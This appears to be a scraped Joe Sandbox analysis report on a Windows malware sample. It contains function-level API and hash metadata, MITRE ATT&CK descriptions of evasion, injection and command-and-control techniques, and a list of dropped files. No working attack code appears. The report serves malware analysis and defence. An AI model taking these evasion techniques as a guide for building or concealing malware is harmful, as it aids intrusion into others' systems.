Concurrency::cancel_current_task.LIBCPMTD ref: 00AA78C9
std::_Lockit::~_Lockit.LIBCPMT ref: 00AA7931

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID:
API String ID: 3053331623-0
Opcode ID: 1670c63cbdd78b69105d377aacc99c4113867ad8096f7304345a910d5afc0b87
Instruction ID: 8f36e4fb2f377977ea66516a132db7830055b9fae7f02468be2416fb9a2422d8
Opcode Fuzzy Hash: 1670c63cbdd78b69105d377aacc99c4113867ad8096f7304345a910d5afc0b87
Instruction Fuzzy Hash: 123114B4D04209DBCB04EF98C991BEFBBB4BF49310F20461AE416673D1DB346A41CBA1

Function 00AA7D70 Relevance: 7.6, APIs: 5, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00AA7D90
int.LIBCPMTD ref: 00AA7DA9

Part of subcall function 00AA1E00: std::_Lockit::_Lockit.LIBCPMT ref: 00AA1E16
Part of subcall function 00AA1E00: std::_Lockit::~_Lockit.LIBCPMT ref: 00AA1E40

Concurrency::cancel_current_task.LIBCPMTD ref: 00AA7DE9
std::_Lockit::~_Lockit.LIBCPMT ref: 00AA7E51

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID:
API String ID: 3053331623-0
Opcode ID: 3da51098eb2c4b762fef2a8271aaea663e5dddebe5e8044cdb81f649b3e3fa66
Instruction ID: 91b39aeb545d324d508669994cebdc1e9af9302033186819899972ca7ff60a3d
Opcode Fuzzy Hash: 3da51098eb2c4b762fef2a8271aaea663e5dddebe5e8044cdb81f649b3e3fa66
Instruction Fuzzy Hash: 3C3126B4D04209DFCB04EF98C991BEEBBB1BF49310F204669E516673D1DB396A00CBA1

Function 00AB68CB Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(10830A53,00000000,00000000,?), ref: 00AB692E

Part of subcall function 00ABD8F1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ABB507,?,00000000,-00000008), ref: 00ABD952

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00AB6B80
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00AB6BC6
GetLastError.KERNEL32 ref: 00AB6C69

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 050a04c46a56147911f5c1a755a4dae890fb5cbca8e775cd0e7d1e34af117b92
Instruction ID: f074c3e6b8a875e7bc152a40ab4a36e64b2e4997b03083ecb11a4c7331440875
Opcode Fuzzy Hash: 050a04c46a56147911f5c1a755a4dae890fb5cbca8e775cd0e7d1e34af117b92
Instruction Fuzzy Hash: 11D17EB5D002489FCF15CFE8C990AEDBBB9FF09310F28452AE956EB352D634A941CB50

Function 00AACB21 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00AACBE8
___AdjustPointer.LIBCMT ref: 00AACC0B
___AdjustPointer.LIBCMT ref: 00AACCA7

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: de37507afd405e8c8b7ee4adb54de93803943cb0cf25610bfa4e2bf65e6e6115
Instruction ID: 73b902ea64b90009d9c141166a6dff507cddcb0a165920bdc9a99d01622bd699
Opcode Fuzzy Hash: de37507afd405e8c8b7ee4adb54de93803943cb0cf25610bfa4e2bf65e6e6115
Instruction Fuzzy Hash: 2251E271A0060AAFFB298F54D941B7AB7B4EF06331F14452EE81A872D1D736EC81D7A0

Function 00ABDCAE Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00ABD8F1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ABB507,?,00000000,-00000008), ref: 00ABD952

GetLastError.KERNEL32 ref: 00ABDD12
__dosmaperr.LIBCMT ref: 00ABDD19
GetLastError.KERNEL32(?,?,?,?), ref: 00ABDD53
__dosmaperr.LIBCMT ref: 00ABDD5A

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 76563600319e654f0868a35b2b5dc11013e5c8b02f200d57ea0c0c5dbb0e5134
Instruction ID: da4e9d56c4670a6ef89a1db456202d2bed3f8c69bceda627356a0b694525066d
Opcode Fuzzy Hash: 76563600319e654f0868a35b2b5dc11013e5c8b02f200d57ea0c0c5dbb0e5134
Instruction Fuzzy Hash: 6C21BE71600605AFDB20AFB58D81AFBB7ADFF053647548829F86997253EB34EC00CB90

Function 00AB2757 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba660d55a8f6c00983e06897a800415c8e5c4b9170f03f91793a5745578fbffd
Instruction ID: b77c6915eef6d04ffa9251c6381f1d6774fc44a732026e91bda23e171699dffc
Opcode Fuzzy Hash: ba660d55a8f6c00983e06897a800415c8e5c4b9170f03f91793a5745578fbffd
Instruction Fuzzy Hash: 84219D31600205AFDB20AFB58D80EEB77ADFF48365710852AF81997193EB34EC40DBA1

Function 00ABEC36 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00ABEC3E

Part of subcall function 00ABD8F1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ABB507,?,00000000,-00000008), ref: 00ABD952

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00ABEC76
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00ABEC96

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 4d4068527d6bf10c5402e0e53e670887cff78e5c4efcc9a7b48bf9edd8fbfc73
Instruction ID: b66ade1c48ece5508cab2122f8eaa1c3def2446cd4bff019d2f61340f9d0f1c1
Opcode Fuzzy Hash: 4d4068527d6bf10c5402e0e53e670887cff78e5c4efcc9a7b48bf9edd8fbfc73
Instruction Fuzzy Hash: AF11D2B25056297FA711A7B65E8ACFF6DACEEC67A4B110424F802D1103FE78DD1192F1

Function 00AC5BC3 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00AB0FCF,00000000,00000000,?,00AC1F9B,00000000,00000001,?,?,?,00AB6CBD,?,00000000,00000000), ref: 00AC5BDA
GetLastError.KERNEL32(?,00AC1F9B,00000000,00000001,?,?,?,00AB6CBD,?,00000000,00000000,?,?,?,00AB7297,00000000), ref: 00AC5BE6

Part of subcall function 00AC5BAC: CloseHandle.KERNEL32(FFFFFFFE,00AC5BF6,?,00AC1F9B,00000000,00000001,?,?,?,00AB6CBD,?,00000000,00000000,?,?), ref: 00AC5BBC

___initconout.LIBCMT ref: 00AC5BF6

Part of subcall function 00AC5B6E: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00AC5B9D,00AC1F88,?,?,00AB6CBD,?,00000000,00000000,?), ref: 00AC5B81

WriteConsoleW.KERNEL32(00000000,00000000,00AB0FCF,00000000,?,00AC1F9B,00000000,00000001,?,?,?,00AB6CBD,?,00000000,00000000,?), ref: 00AC5C0B

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: bcc1c2eac9284037da0c0c5abe22eddc5f32ad2e3a22bf949bef4f9575a1ed07
Instruction ID: 8f7ceeccef838e8ec6ecc38c07921941872bde471fc03b45a36a57844d4b0818
Opcode Fuzzy Hash: bcc1c2eac9284037da0c0c5abe22eddc5f32ad2e3a22bf949bef4f9575a1ed07
Instruction Fuzzy Hash: 92F01236811519BBCF225FE5DC04E8E3F26FB047E0F464014F91995130DA329D619B90

Function 00AAC810 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00AAC84F
__IsNonwritableInCurrentImage.LIBCMT ref: 00AAC903

Strings

csm, xrefs: 00AAC8ED

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 81166ea33f581baaa8f41d2518558cc3bb6510a94b049f128b7335ed347182e1
Instruction ID: 50a2a05ac1863bc8b0786f9435a887ef97b0357376b677406b4df827cfde725f
Opcode Fuzzy Hash: 81166ea33f581baaa8f41d2518558cc3bb6510a94b049f128b7335ed347182e1
Instruction Fuzzy Hash: 6C41A434E00209AFDF10DF68C885A9EBBB5BF4A324F148156E819AB3D2D735D905CF90

Function 00AAD122 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00AAD147

Strings

MOC, xrefs: 00AAD159
RCC, xrefs: 00AAD161

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: ed49575cf8f4c82cf24e5b3ce7bfe6b55476cea801821ee0024f94bc5ebf8ce1
Instruction ID: 5ebc622c466738d0c40a6baf4679f9efa8826794e952c08b5692c9367d54c32f
Opcode Fuzzy Hash: ed49575cf8f4c82cf24e5b3ce7bfe6b55476cea801821ee0024f94bc5ebf8ce1
Instruction Fuzzy Hash: F1415672900209AFCF15DF98CD81AEEBBB5BF4A300F148199F905B72A1D335DA51DB50

Function 00AA5C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 00AA5C8A
codecvt.LIBCPMTD ref: 00AA5CC0

Strings

, xrefs: 00AA5CA0

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: char_traitscodecvt
String ID:
API String ID: 1910604377-3916222277
Opcode ID: aa37150b5d08dbbb7838f528ed59c5b09e75053191fb0526cbfe20edd545f021
Instruction ID: 893b8ce7df5bf319ad6c450fe2d67a974876ca8a3ecbe775e517e21dda816075
Opcode Fuzzy Hash: aa37150b5d08dbbb7838f528ed59c5b09e75053191fb0526cbfe20edd545f021
Instruction Fuzzy Hash: A8316970D04609EFCF44DFA4C594AEEB7B5AF46304F288199E012AB281E735AF45EB64

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report LisectAVT_2403002B_78.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Mysoftwaref\4.bin

C:\Program Files (x86)\Mysoftwaref\cximagecrt.dll

C:\Program Files (x86)\Mysoftwaref\libcurl.dll

C:\Program Files (x86)\Mysoftwaref\msvcp120.dll

C:\Program Files (x86)\Mysoftwaref\msvcp140.dll

C:\Program Files (x86)\Mysoftwaref\msvcr120.dll

C:\Program Files (x86)\Mysoftwaref\software.exe

C:\Program Files (x86)\Mysoftwaref\vcruntime140.dll

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_LisectAVT_240300_f25cc6c7bfcfed304a6d9d6f9776533c335c6b_7a9050f1_efe7e75f-a8f7-4b62-a3e1-c7b7e22e62fe\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1547.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1642.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1662.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\libcurl[1].dll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcr120[1].dll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\QT2[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\cximagecrt[1].dll

